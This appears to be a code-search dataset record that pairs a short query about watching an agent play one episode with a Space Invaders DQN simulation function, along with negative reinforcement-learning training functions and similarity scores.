start_epoch, start_step, dev_data, teacher_forcing_ratio, early_stopping_patience):\n print_loss_total = 0 # Reset every print_every\n epoch_loss_total = 0 # Reset every epoch\n\n device = None if torch.cuda.is_available() else -1\n batch_iterator = torchtext.data.BucketIterator(data, batch_size=self.batch_size, repeat=False,\n sort_key=lambda x: len(x.src),\n shuffle=True, device=device, sort=False, sort_within_batch=True)\n\n steps_per_epoch = len(batch_iterator)\n total_steps = steps_per_epoch * n_epochs\n\n step = start_step\n step_elapsed = 0\n previous_dev_loss = 10e6\n dev_loss_increased_epochs = 0\n for epoch in range(start_epoch, n_epochs + 1):\n self.logger.info(\"Epoch: %d, Step: %d\" % (epoch, step))\n\n batch_generator = batch_iterator.__iter__()\n # consuming seen batches from previous training\n for _ in range((epoch - 1) * steps_per_epoch, step):\n next(batch_generator)\n\n model.train(True)\n for batch in batch_generator:\n step += 1\n step_elapsed += 1\n\n input_variables, input_lengths = getattr(batch, UTTERANCE_FIELD_NAME)\n target_variables = getattr(batch, RESPONSE_FIELD_NAME)\n emotion_variables = getattr(batch, EMOTION_FIELD_NAME)\n\n loss = self.train_batch(input_variables, input_lengths.tolist(), target_variables, emotion_variables,\n model, teacher_forcing_ratio)\n\n # Record average loss\n print_loss_total += loss\n epoch_loss_total += loss\n\n if step % self.print_every == 0 and step_elapsed > self.print_every:\n print_loss_avg = print_loss_total / self.print_every\n print_loss_total = 0\n log_msg = 'Progress: %.2f%%, Train %s: %.4f' % (\n step / total_steps * 100,\n self.loss.name,\n print_loss_avg)\n self.logger.info(log_msg)\n beam_search = EmotionSeq2seq(model.encoder, EmotionTopKDecoder(model.decoder, 20))\n predictor = Predictor(beam_search, data.vocabulary, data.emotion_vocabulary)\n seq = \"how are you\".split()\n self.logger.info(\"Happy: \" + \" \".join(predictor.predict(seq, 'happiness')))\n self.logger.info(\"Angry: \" + \" \".join(predictor.predict(seq, 'anger')))\n\n # Checkpoint\n if step % self.checkpoint_every == 0 or step == total_steps:\n Checkpoint(model=model,\n optimizer=self.optimizer,\n epoch=epoch, step=step).save(self.expt_dir)\n\n if step_elapsed == 0:\n continue\n\n epoch_loss_avg = epoch_loss_total / min(steps_per_epoch, step - start_step)\n epoch_loss_total = 0\n log_msg = \"Finished epoch %d: Train %s: %.4f\" % (epoch, self.loss.name, epoch_loss_avg)\n if dev_data is not None:\n dev_loss, accuracy = self.evaluator.evaluate(model, dev_data)\n self.optimizer.update(dev_loss)\n log_msg += \", Dev %s: %.4f, Accuracy: %.4f\" % (self.loss.name, dev_loss, accuracy)\n model.train(mode=True)\n if dev_loss > previous_dev_loss:\n dev_loss_increased_epochs += 1\n if dev_loss_increased_epochs == early_stopping_patience:\n self.logger.info(\"EARLY STOPPING\")\n break\n else:\n dev_loss_increased_epochs = 0\n previous_dev_loss = dev_loss\n Checkpoint(model=model,\n optimizer=self.optimizer,\n epoch=epoch, step=step).save(self.expt_dir)\n else:\n self.optimizer.update(epoch_loss_avg)\n\n self.logger.info(log_msg)", "def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n player = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, player)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, player, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, player = self.game.getNextState(board, player, action)\n\n r = self.game.getGameEnded(board, player)\n\n if r != 0:\n ex = [(x[0], x[2], r * ((-1) ** (x[1] != player))) for x in trainExamples]\n return ex", "def train(self):\n self.emission_model(self.train_data)\n self.transition_model(self.train_data)", "def training(self, dataset, repeat=1, gamma=1.0, learning_rate=0.1, model='3yo'):\n for _ in range(repeat):\n for episode in dataset:\n # 1- Get the data stored inside the dataset\n image_index = episode[0] # image of the object\n label_index = episode[1] # label given by the informant\n informant_index = episode[2] # a integer representing the informant\n informant_action = episode[3] # 0=reject, 1=accept\n\n # 2- The agent take an action (with softmax) considering is current state-action table\n # [0=cup, 1=book, 2=ball]\n col = (image_index * self.tot_images) + label_index\n action_array = self.actor_matrix[:, col]\n action_distribution = self._softmax(action_array)\n child_action = np.random.choice(self.tot_actions,\n 1,\n p=action_distribution) # select the action through softmax\n\n # 3- (External) New state and reward obtained from the environment\n # u_t = self.critic_vector[0, col] # previous state\n # New state is estimated, in this simple case nothing happen\n # because the next state is terminal\n # u_t1 = u_t # Only in this example they are the same\n\n # 4- (Intrinsic) The informant_reputation is updated:\n # agent_action, agent_confidence, informant_action, reward\n # informant_vector: 0=unreliable, 1=reliable\n # do_actions_agree: False, True\n # Estimating child_confidence\n distance = np.absolute(action_distribution[0] - action_distribution[1])\n child_confidence_distribution = [1 - distance, distance] # non-knowledgeable, knowledgeable\n child_confidence = np.random.choice(2, 1, p=child_confidence_distribution)\n # Check if child and informant agree\n if (child_action == informant_action):\n do_actions_agree = True\n else:\n do_actions_agree = False\n # Increment the counter in the informant_vector.\n # Here we update the counter distribtuion only if\n # the child is confident, because it is only in that\n # case that the child can say if the informant is\n # reliable or not.\n if (do_actions_agree == False and child_confidence == 1):\n self.informant_vector[informant_index][0] += 1 # unreliable\n elif (do_actions_agree == True and child_confidence == 1):\n self.informant_vector[informant_index][1] += 1 # reliable\n elif (do_actions_agree == False and child_confidence == 0):\n self.informant_vector[informant_index][1] += 0 # reliable\n self.informant_vector[informant_index][0] += 0 # unreliable\n elif (do_actions_agree == True and child_confidence == 0):\n self.informant_vector[informant_index][1] += 0 # reliable\n self.informant_vector[informant_index][0] += 0 # unreliable\n else:\n raise ValueError(\"ERROR: anomaly in the IF condition for informant_vector update\")\n # Using the informant_vector given as input it estimates the reputation of the informant\n informant_reputation_distribution = np.true_divide(self.informant_vector[informant_index],\n np.sum(self.informant_vector[informant_index]))\n informant_reputation = np.random.choice(2, 1, p=informant_reputation_distribution)\n\n # 5- (Intrinsic) The Cost is estimated:\n # current_state, agent_action, agent_confidence, informant_action, informant_reputation\n # child_confidence: 0=non-knowledgeable, 1=knowledgeable\n # informant_reputation: 0=non-knowledgeable, 1=knowledgeable\n # action: 0=reject, 1=accept\n # informant_action: 0=reject, 1=accept\n cost = self._return_cost(child_confidence,\n informant_reputation,\n child_action,\n informant_action,\n value=model)\n\n # 6- The utility table is updated using: previous_state, current_state, cost, reward\n # Updating the critic using Temporal Differencing Learning\n # In this simple case there is not a u_t1 state.\n # The current state is considered terminal.\n # We can delete the term (gamma*u_t1)-u_t and considering\n # only (reward-cost) as utility of the state (see Russel Norvig).\n reward = 0 # only for intrinsic learning reward=0\n delta = (reward - cost) # + (gamma*u_t1) - u_t\n self.critic_vector[0, col] += learning_rate * delta\n\n # 7- The actor table is updated using the delta from the critic\n # Update the ACTOR using the delta\n self.actor_matrix[child_action, col] += learning_rate * delta # the current action\n self.actor_matrix[1 - child_action, col] -= learning_rate * delta # the opposite action", "def train_ddpg(agent, env, n_episodes=400, max_t=1000, save=True):\n # get the default brain\n brain_name = env.brain_names[0]\n scores_deque = deque(maxlen=100)\n final_scores = []\n not_solved = True\n num_agents = len(env.reset()[brain_name].vector_observations)\n best = 0\n episodes_remaining = n_episodes\n for i_episode in range(1, n_episodes+1):\n env_info = env.reset()[brain_name]\n states = env_info.vector_observations\n agent.reset()\n agent_scores = np.zeros(num_agents)\n for t in range(max_t):\n actions = agent.act(states)\n env_info = env.step(actions)[brain_name]\n next_states = env_info.vector_observations\n rewards = env_info.rewards\n dones = env_info.local_done\n agent.step(states, actions, rewards, next_states, dones)\n states = next_states\n agent_scores += rewards\n if np.any(dones):\n break\n\n max_score = np.max(agent_scores)\n scores_deque.append(max_score)\n final_scores.append(max_score)\n print('\\rEpisode {}\\tAverage Score: {:.2f}\\tScore: {:.2f}'.format(i_episode, np.mean(scores_deque), max_score), end=\"\", flush=True)\n if len(scores_deque) == 100 and np.mean(scores_deque) > SOLVED_SCORE and not_solved:\n not_solved = False\n episodes_remaining = EPISODES_AFTER_SOLVE # try to increase score for some episodes\n print(\"\\nEnvironment solved in {} episodes!\\n\".format(i_episode), flush=True)\n if save:\n torch.save(agent.actor_local.state_dict(), 'saved_models/actor_solved.pth')\n torch.save(agent.critic_local.state_dict(), 'saved_models/critic_solved.pth')\n if i_episode % 100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_deque)), flush=True)\n\n if not not_solved and i_episode % 5 == 0 and np.mean(scores_deque) > best:\n best = np.mean(scores_deque)\n if save:\n torch.save(agent.actor_local.state_dict(), 'saved_models/best_actor.pth')\n torch.save(agent.critic_local.state_dict(), 'saved_models/best_critic.pth')\n\n if not not_solved:\n episodes_remaining -= 1\n if episodes_remaining == 0:\n break\n\n return final_scores", "def train(self, persist: bool = False, run: int = -1, checkpoint: int = -1):\n self.meta = ICMMetaDataV1(fp=open(os.path.join(MODULE_CONFIG.BaseConfig.BASE_DIR, 'agent_stats.csv'), 'w'),\n args=self.state.config)\n train_start = time.time()\n for episode in range(self.state.episodes):\n start_time = time.time()\n state = self.env.reset()\n state = torch.reshape(tensor(state, dtype=torch.float32), [1, 84, 84, 4]).permute(0, 3, 1, 2).to(\n self.device)\n done = False\n episode_reward = []\n episode_loss = []\n\n # save network\n # if episode % self.state.model_save_interval == 0:\n # save_path = self.state.model_save_path + '/' + self.run_name + '_' + str(episode) + '.pt'\n # torch.save(self.q_network.state_dict(), save_path)\n # print('Successfully saved: ' + save_path)\n\n # Save Model\n self.save(episode)\n # Collect garbage\n # To Do Later\n\n while not done:\n\n # update target network\n if self.state.step % self.state.network_update_interval == 0:\n print('Updating target network')\n self.target_network.load_state_dict(self.q_network.state_dict())\n\n if self.state.step > len(self.replay_memory):\n self.state.epsilon = max(self.state.final_epsilon,\n self.state.initial_epsilon - self.state.epsilon_step * self.state.step)\n if self.state.epsilon > self.state.final_epsilon:\n self.state.mode = 'Explore'\n else:\n self.state.mode = 'Exploit'\n\n action, q = self.take_action(state, test=False, state_count=0)\n next_state, reward, done, _ = self.env.step(action)\n\n next_state = torch.reshape(tensor(next_state, dtype=torch.float32), [1, 84, 84, 4]).permute(0, 3, 1,\n 2).to(\n self.device)\n self.push((state, torch.tensor([int(action)]), torch.tensor([reward], device=self.device), next_state,\n torch.tensor([done], dtype=torch.float32)))\n episode_reward.append(reward)\n self.state.step += 1\n state = next_state\n\n # train network\n if self.state.step >= self.start_to_learn and self.state.step % self.state.network_train_interval == 0:\n loss = self.optimize_network()\n episode_loss.append(loss)\n\n if done:\n # print('Episode:', episode, ' | Steps:', self.state.step, ' | Eps: ', self.state.epsilon,\n # ' | Reward: ',\n # sum(episode_reward),\n # ' | Avg Reward: ', np.mean(self.last_n_rewards), ' | Loss: ',\n # np.mean(episode_loss), ' | Intrinsic Reward: ', sum(self.intrinsic_episode_reward),\n # ' | Avg Intrinsic Reward: ', np.mean(self.last_n_intrinsic_rewards),\n # ' | Mode: ', self.state.mode)\n # print('Episode:', episode, ' | Steps:', self.state.step, ' | Eps: ', self.state.epsilon,\n # ' | Reward: ',\n # sum(episode_reward),\n # ' | Avg Reward: ', np.mean(self.last_n_rewards), ' | Loss: ',\n # np.mean(episode_loss), ' | Intrinsic Reward: ', sum(self.intrinsic_episode_reward),\n # ' | Avg Intrinsic Reward: ', np.mean(self.last_n_intrinsic_rewards),\n # ' | Mode: ', self.state.mode, file=self.log_file)\n # self.log_summary(episode, episode_loss, episode_reward)\n self.last_n_rewards.append(sum(episode_reward))\n self.last_n_intrinsic_rewards.append(sum(self.intrinsic_episode_reward))\n self.meta.update_episode(episode, self.state.step, self.state.epsilon,\n sum(episode_reward), np.mean(self.last_n_rewards),\n np.mean(episode_loss), sum(self.intrinsic_episode_reward),\n np.mean(self.last_n_intrinsic_rewards), self.state.mode)\n\n episode_reward.clear()\n episode_loss.clear()\n self.intrinsic_episode_reward.clear()" ]
[ "0.75523275", "0.743832", "0.74258286", "0.7422637", "0.7364126", "0.73365295", "0.73187625", "0.72586364", "0.7242011", "0.7233209", "0.72105044", "0.7161378", "0.71507365", "0.713142", "0.71212167", "0.71001995", "0.7051916", "0.7029939", "0.7000444", "0.6976201", "0.69314533", "0.6915431", "0.69015545", "0.6894078", "0.68907684", "0.68884885", "0.6881044", "0.68423784", "0.679889", "0.67598325", "0.67593294", "0.6724972", "0.6722011", "0.67207557", "0.668557", "0.66777647", "0.6665364", "0.6660342", "0.6654145", "0.6651742", "0.66388226", "0.663298", "0.66253185", "0.66232175", "0.66160107", "0.6615185", "0.6581718", "0.65808004", "0.65801597", "0.65799236", "0.6573005", "0.6571938", "0.6570316", "0.65682286", "0.654321", "0.6539214", "0.6538776", "0.65385246", "0.65346813", "0.6527291", "0.65263265", "0.6517368", "0.65134066", "0.6510297", "0.65061164", "0.6503084", "0.64991164", "0.6496695", "0.6493429", "0.6487343", "0.64844394", "0.64721686", "0.647178", "0.6454772", "0.6454772", "0.6454772", "0.6454772", "0.643299", "0.6431333", "0.64186037", "0.6416292", "0.6410764", "0.6408612", "0.64061856", "0.64039975", "0.6397238", "0.6397238", "0.6397238", "0.6397238", "0.6397238", "0.638773", "0.6385073", "0.6384868", "0.637654", "0.63701266", "0.63694817", "0.6364117", "0.63626534", "0.6361415", "0.6353743" ]
0.66573066
38
Test the agen and watch it play for one episode.
def simulate(self): print("##################################") print("SIMULATING GAME - SpaceInvaders..") print("##################################") # Play 3 episodes: for i in range(3): print("Playing Episode %d" % i) state = self.env.reset() #self.env.render() done = False tot_reward = 0 state,_ = stack_frames(self.stack_size,self.stacked_frames, state, True) # play until dead. while not done: # get the value predicted by the model and perform that action. # keras conv2d expects a 4D input. So add an empty axis. state = np.expand_dims(state, axis=0) # predict action directly from the saved neural network. action = np.argmax(self.dqn.getModel().predict(state)[0]) # perform that action. state, reward, done, _ = self.env.step(action) self.env.render() state,_ = stack_frames(self.stack_size,self.stacked_frames, state, False) tot_reward+=reward print("Reward: ", tot_reward) self.env.close() # to avoid sys.meta_path error
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test():\n env = gym.make('CartPole-v1')\n\n results = []\n for _ in range(100):\n results.append(episode(env, render=False, verbose=False))\n\n print(f'average={sum(results) / len(results)} '\n f'max={max(results)} '\n f'min={min(results)}')", "def test_scraper(self):\n scrap = ScraperModule(url=self.anime_link, host=\"mixdrop\")\n pages = scrap.pages\n print(f\"pages: {pages}\")\n get_pages = scrap.get_pages()\n first_link = scrap.get_links(pages[0])\n print(first_link)\n episodes = scrap.get_episodes()\n print(episodes)", "def play(self, test_ep=0., n_step=10000, n_episode=1000):\n\n # If not training, clear log of old data, initialize TF variables, and load model.\n if self.stat and not self.is_train:\n tf.initialize_all_variables().run()\n self.stat.load_model()\n\n self.target_network.run_copy()\n\n rewards = []\n game_lengths = []\n\n # Play at least n_episode episodes.\n while np.sum(game_lengths) < n_episode:\n\n # Start a new game.\n observation, reward, terminal = self.new_game()\n current_reward = 0\n\n # Add initial frames to history.\n for _ in range(self.history_length):\n self.history.add(observation)\n\n # Play game until 'terminal.'\n for t in range(n_step):\n # 1. Predict.\n action = self.predict(self.history.get(), test_ep)\n # 2. Act.\n observation, reward, terminal, _ = self.env.step(action, is_training=False)\n # 3. Observe.\n self.history.add(observation)\n \n current_reward += reward\n\n if terminal:\n break\n\n # Set tqdm range description.\n if self.t_range and not self.chtc:\n self.t_range.set_description('PLAY: %d/%d' % (np.sum(game_lengths), n_episode))\n\n # After game, add game length and rewards.\n rewards.append(float(current_reward))\n game_lengths.append(terminal)\n\n if self.t_range and not self.chtc:\n self.t_range.set_description()\n \n self.compute_statistics(rewards, game_lengths)", "def OnEnterEpisode(self):\n pass", "def run_episode(self):\n self.pygame_clock = pygame.time.Clock()\n while True:\n pygame.event.pump()\n is_human_agent = isinstance(self.agents[self.env.turn], HumanAgent)\n\n # handle exit event\n self.handle_input_event()\n\n # pick the next action\n if is_human_agent:\n self.handle_input_event()\n else:\n self.ai_event()\n self.place_a_disk()\n self.render()\n\n if self.event == Event.END_GAME:\n pygame.time.wait(self.END_GAME_DELAY)\n\n if self.event == Event.END_GAME_VIEW:\n pygame.time.wait(self.END_GAME_VIEW_DELAY)\n break", "def set_episode_check(self, alias, epi, check):\n re_m = re.match(r's(\\d{1,2})e(\\d{1,2})', epi.lower())\n if not re_m:\n print('Bad format for check - \"{0}\"'.format(epi))\n else:\n season = int(re_m.group(1))\n episode = int(re_m.group(2))\n show_id = self.id_by_title(self.title_by_alias(alias, no_exit=True))\n epis = self.load_episodes(show_id)\n watched = self.load_watched(show_id)\n episodes = epis['episodes']\n for epi_id in episodes:\n next_episode = episodes[epi_id]\n if (\n next_episode['seasonNumber'] == season and\n next_episode['episodeNumber'] == episode\n ):\n valid_op = False\n old_date = ''\n if check:\n msg = 'checked'\n if epi_id in watched:\n old_date = watched[epi_id]['watchDate']\n else:\n url = self.config['url']['check_episode'].format(epi_id)\n valid_op = True\n else:\n msg = 'unchecked'\n if epi_id in watched:\n url = self.config['url']['uncheck_episode'].format(epi_id)\n valid_op = True\n\n if not valid_op:\n print()\n print('Episode \"{0}\" (s{1:02d}e{2:02d}) of \"{3}\" already {4} {5}'\n .format(\n tr_out(next_episode['title']),\n next_episode['seasonNumber'],\n next_episode['episodeNumber'],\n tr_out(epis['title']),\n msg,\n old_date\n ))\n else:\n logging.debug('Set checked: %s%s', self.api_url, url)\n request = urllib.request.Request(self.api_url + url)\n self.opener.open(request)\n print()\n print(\n 'Episode \"{0}\" (s{1:02d}e{2:02d}) of \"{3}\" set {4}'\n .format(\n tr_out(next_episode['title']),\n next_episode['seasonNumber'],\n next_episode['episodeNumber'],\n tr_out(epis['title']),\n msg\n ))\n break", "def test_create_episode(self):\n episode = self._create_sample_episode()\n\n self.assertEqual(\n self.storage.get_episode(episode.study_id, episode.session_id,\n episode.id), episode)", "def test(self):\n total_steps = 0\n running_scores = np.zeros(len(self.agents))\n\n for e in range(self.run_settings.test_episodes):\n # Initialize episode\n try:\n env_states, rewards, done, metainfo = self.custom_env.reset()\n except EpisodeCrashException:\n print('Episode crashed, resetting.')\n continue\n\n # Initialize scores to starting reward (probably 0)\n scores = np.array(rewards)\n step = 0\n\n while not done:\n states = [self.agents[a].state_space_converter(env_states[a])\n for a in range(len(self.agents))]\n\n # Get actions\n actions = [self.agents[a].sample(states[a])\n for a in range(len(self.agents))]\n env_actions = [self.agents[a].action_space_converter(actions[a])\n for a in range(len(self.agents))]\n if self.run_settings.verbose:\n self.print_action(env_actions)\n # Take environment step\n try:\n env_states, rewards, done, metainfo = self.custom_env.step(env_actions)\n except EpisodeCrashException:\n print('Episode crashed, resetting.')\n break\n step += 1\n total_steps += 1\n\n # Update scores\n scores += np.array(rewards)\n\n if done:\n running_scores += scores\n\n if len(scores) == 1:\n scores = scores[0]\n if self.run_settings.verbose:\n print(\"Game {} ended after {} steps. Game score: {}\"\n .format(e+1, step, scores))\n if self.run_settings.verbose:\n print(\"Average game scores: {}\".format(running_scores / self.run_settings.test_episodes))", "def OnEpisodeStart(self):\n pass", "def test_get_episode_overview(self):\n self.assertEquals(\n self.t['Battlestar Galactica (2003)'][1][6]['overview'].startswith(\n 'When a new copy of Doral, a Cylon who had been previously'),\n True\n )", "def new_episode(self):\n self.game.new_episode()", "def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n player = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, player)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, player, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, player = self.game.getNextState(board, player, action)\n\n r = self.game.getGameEnded(board, player)\n\n if r != 0:\n ex = [(x[0], x[2], r * ((-1) ** (x[1] != player))) for x in trainExamples]\n return ex", "def testBeginEpisode(self):\n with tf.compat.v1.Session() as sess:\n agent = self._create_test_agent(sess)\n # We fill up the state with 9s. On calling agent.begin_episode the state\n # should be reset to all 0s.\n agent.state.fill(9)\n first_observation = np.ones(self.observation_shape + (1,))\n self.assertEqual(agent.begin_episode(first_observation), 0)\n # When the all-1s observation is received, it will be placed at the end of\n # the state.\n expected_state = self.zero_state\n expected_state[:, :, :, -1] = np.ones((1,) + self.observation_shape)\n self.assertAllEqual(agent.state, expected_state)\n self.assertAllEqual(agent._observation, first_observation[:, :, 0])\n # No training happens in eval mode.\n self.assertEqual(agent.training_steps, 0)\n\n # This will now cause training to happen.\n agent.eval_mode = False\n # Having a low replay memory add_count will prevent any of the\n # train/prefetch/sync ops from being called.\n agent._replay.memory.add_count = 0\n second_observation = np.ones(self.observation_shape + (1,)) * 2\n agent.begin_episode(second_observation)\n # The agent's state will be reset, so we will only be left with the all-2s\n # observation.\n expected_state[:, :, :, -1] = np.full((1,) + self.observation_shape, 2)\n self.assertAllEqual(agent.state, expected_state)\n self.assertAllEqual(agent._observation, second_observation[:, :, 0])\n # training_steps is incremented since we set eval_mode to False.\n self.assertEqual(agent.training_steps, 1)", "def run(self) -> None:\n for episode in range(1, self.episodes + 1):\n print('Episode:', episode)\n steps, state_action_history = self.run_one_episode()\n self.steps_per_episode.append(steps)\n if episode % parameters.CACHING_INTERVAL == 0 or steps < 1000:\n visualize.animate_track(state_action_history, f'agent-{episode}')\n\n print('Training completed.')\n visualize.plot_steps_per_episode(self.steps_per_episode)\n visualize.plot_epsilon(self.agent.epsilon_history)\n\n if parameters.VISUALIZE_FINAL_GAME:\n print('Showing one episode with the greedy strategy.')\n self.agent.epsilon = 0\n steps, state_action_history = self.run_one_episode()\n print(f'Episode completed in {steps} steps.')\n visualize.animate_track(state_action_history)", "def test_plays_get(self):\n pass", "def startEpisode(self):\n self.lastState = None\n self.lastAction = None\n self.episodeRewards = 0.0\n\n print(\"Agent Start Episode #\" + str(self.episodesSoFar+1))", "def watch_episode(logger, n_episodes: int = 1):\n\n # play match\n for episode in logger.observations:\n for steps in logger.observations[episode]:\n clear_output(wait=True)\n plt.imshow(steps)\n plt.show()\n if n_episodes - 1 >= episode:\n break", "def run_episode(self, mode=0, eps=0.):\n if mode==0:\n eps = 0.\n done = False\n score = 0 \n \n while not done:\n state = self.env_info.vector_observations[0] # get the current state\n action = self.agent.act(state, eps=eps) # get an action using epsilon greedy policy\n self.env_info = self.env.step(action)[self.brain_name] # send the action to the environment\n next_state = self.env_info.vector_observations[0] # get the next state\n reward = self.env_info.rewards[0] # get the reward\n done = self.env_info.local_done[0] # see if episode has finished\n \n if mode == 1:\n self.agent.step(state, action, reward, next_state, done)\n \n score += reward\n \n self.reset_env() # reset the environment\n \n return score", "def testPlayback(self):\n \n pass", "def start_episode(self):\n self.last_sensation = self.env()\n self.next_action = self.agent(self.last_sensation)", "def test_single_track_ep(self):\n self.add_mp3()\n (added, status) = self.app.add_album(self.filenames, 'ep')\n self.assertEqual(added, True)\n self.assertEqual(self.get_album_count(), 1)\n album = Album.get_by_artist_album(self.app.curs, 'Artist', 'Album')\n self.assertNotEqual(album, None)\n self.assertEqual(album.artist, 'Artist')\n self.assertEqual(album.album, 'Album')\n self.assertEqual(album.album_type, 'ep')\n self.assertEqual(album.totalseconds, 2)\n self.assertEqual(album.totaltracks, 1)", "def show_next_for_watch(self, alias):\n show_id = self.id_by_title(self.title_by_alias(alias, no_exit=True))\n epis = self.load_episodes(show_id)\n episode_id = self.get_first_unwatched(show_id)\n if episode_id is None:\n print(\"\\nCannot find first watch for {0}\\n\".format(tr_out(epis['title'])))\n else:\n episode = epis['episodes'][episode_id]\n print('\\nFirst watch for {0} is s{1:02d}e{2:02d} (\"{3}\")\\n'.format(\n tr_out(epis['title']),\n episode['seasonNumber'], episode['episodeNumber'],\n tr_out(episode['title']),\n ))", "def OnEpisodeOver(self):\n pass", "def run(self):\n time.sleep(np.random.rand())\n np.random.seed(np.int32(time.time() % 1000 * self.id))\n \n # Put this in a while loop that checks a shared variable\n # Will keep running episodes until the shared variable reports False\n while(self.exit_flag == 0):\n for experience in self.run_episode():\n print(experience.state, experience.reward)\n self.training_q.put(experience)", "def add_episode(self, ep):\n #make da season\n ses = self._add_season(ep)\n dvdses = self._add_season(ep, dvd=True) \n self._add_episode(ep, ses)\n self._add_episode(ep, dvdses, dvd=True)", "def test_seasons(self):\n response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)", "def testGetEpisodeName(self):\n\t\tfor case in self.testCases:\n\t\t\tassert case['title'] == getEpisodeName( case['show'], case['season'], case['episode'])", "def begin_episode(self):\n self.action = PlayerAction.STAND_STILL", "def play_episodes(env, policy, render_option, num_eps, pause_time, min_steps):\n env.reset()\n if pause_time != 0:\n for _ in range(int(pause_time / 0.01)):\n env.render()\n time.sleep(0.01)\n total_reward = 0.0\n for _ in range(num_eps):\n episode_reward = play_episode(env, policy, render_option, min_steps)\n total_reward += episode_reward\n avg_reward = total_reward / num_eps\n print('finished {0} episodes with average reward {1}'.format(num_eps, avg_reward))\n return avg_reward", "def run(self, num_episodes=1):\n pygame.display.update()\n self.fps_clock = pygame.time.Clock()\n\n try:\n for episode in range(num_episodes):\n self.run_episode()\n self.env.new_episode()\n self.event = Event.next(self.event)\n except QuitRequestedError:\n print(\"Exit Program\")\n\n pygame.quit()", "def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n self.curPlayer = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, self.curPlayer)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, self.curPlayer, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, self.curPlayer = self.game.getNextState(board, self.curPlayer, action)\n\n r = self.game.getGameEnded(board, self.curPlayer)\n\n if r != 0:\n return [(x[0], x[2], r * ((-1) ** (x[1] != self.curPlayer))) for x in trainExamples]", "def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n self.curPlayer = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, self.curPlayer)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, self.curPlayer, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, self.curPlayer = self.game.getNextState(board, self.curPlayer, action)\n\n r = self.game.getGameEnded(board, self.curPlayer)\n\n if r != 0:\n return [(x[0], x[2], r * ((-1) ** (x[1] != self.curPlayer))) for x in trainExamples]", "def play(self):\n if not self.tiempos.esta_vacia():\n self._reproducir(self.tiempos.actual())", "def terminal_test(self):\n\n for self.cur_ep in tqdm.tqdm(range(1, self.episodes + 1), ascii=True, unit='episodes'):\n\n # Nombre de passages dans la boucle principale\n step = 1\n\n cur_state = self.env.reset()\n\n done = False\n\n while not done:\n\n # Choix au hasard entre :\n if np.random.random() > self.epsilon:\n # Action à partir de la q-table\n action = np.argmax(self.agent.get_q_values(np.array(cur_state)))\n\n else:\n # Action random\n action = np.random.randint(0, self.env.ACTION_SPACE_SIZE)\n\n # On effectue une action avec le serpent\n new_state, reward, done = self.env.step(action)\n\n # Ajout d'un exemple dans la mémoire\n self.agent.update_training_set((cur_state, action, reward, new_state, done))\n\n # Entrainement éventuel\n self.agent.train()\n\n cur_state = new_state\n step += 1\n\n if self.epsilon > self.MIN_EPSILON:\n self.epsilon *= self.EPSILON_DECAY\n self.epsilon = max(self.MIN_EPSILON, self.epsilon)\n\n if self.save_model:\n self.agent.save_model(self.model_file_name)", "def debug():\n env = gym.make('CartPole-v1')\n env = gym.wrappers.Monitor(env, 'videos/', force=True)\n reward = episode(env, render=True, verbose=True)\n print(f'Reward: {reward}')", "def play(self):\n observation = self.env.reset()\n count = 0\n reward_sum = 0\n random_episodes = 0\n\n while random_episodes < 10:\n self.env.render()\n x = observation.reshape(-1, 4)\n q_values = self.model.predict(x)[0]\n action = np.argmax(q_values)\n observation, reward, done, _ = self.env.step(action)\n count += 1\n reward_sum += reward\n\n if done:\n print(\"Reward for this episode was: {}, turns was: {}\".format(reward_sum, count))\n random_episodes += 1\n reward_sum = 0\n count = 0\n observation = self.env.reset()\n\n self.env.close()", "def run_episode(self):\n self.reset_episode()\n obs = self.env.reset()\n while True:\n action = self.Policy[self.env.stateDict[obs]]\n new_obs, reward, done, _ = self.env.step(action)\n if self.mode=='debug':\n print(\"PrevObs:{}, Action:{}, Obs:{}, Reward:{}, Done:{}\"\n .format(obs, action, new_obs,reward,done))\n self.totalReward += reward\n self.totalSteps += 1\n if done:\n break\n else:\n obs = new_obs\n return self.totalReward", "def episode_step(self):\n self.nsteps += 1", "def play_against_random(env, q_value, n_episodes = 100,\n play_as = 'O', render = False, self_play = False):\n \n assert play_as in ['X','O'], \"Player should be X or O\"\n \n \n running_reward = []\n \n for episode in range(n_episodes):\n \n #start episode\n state = env.reset()\n done = False\n \n while not done:\n \n if play_as == state[1] :\n #print(\"q learner\")\n action = e_greedy(state,env,q_value, inference = True)[0]\n \n else:\n if self_play:\n action = e_greedy(state,env,q_value, inference = True)[0]\n else:\n action = random_player(env)\n \n state,reward,done, _ = env.step(action)\n \n if render:\n env.render()\n print(reward, \"\\n\\n\")\n 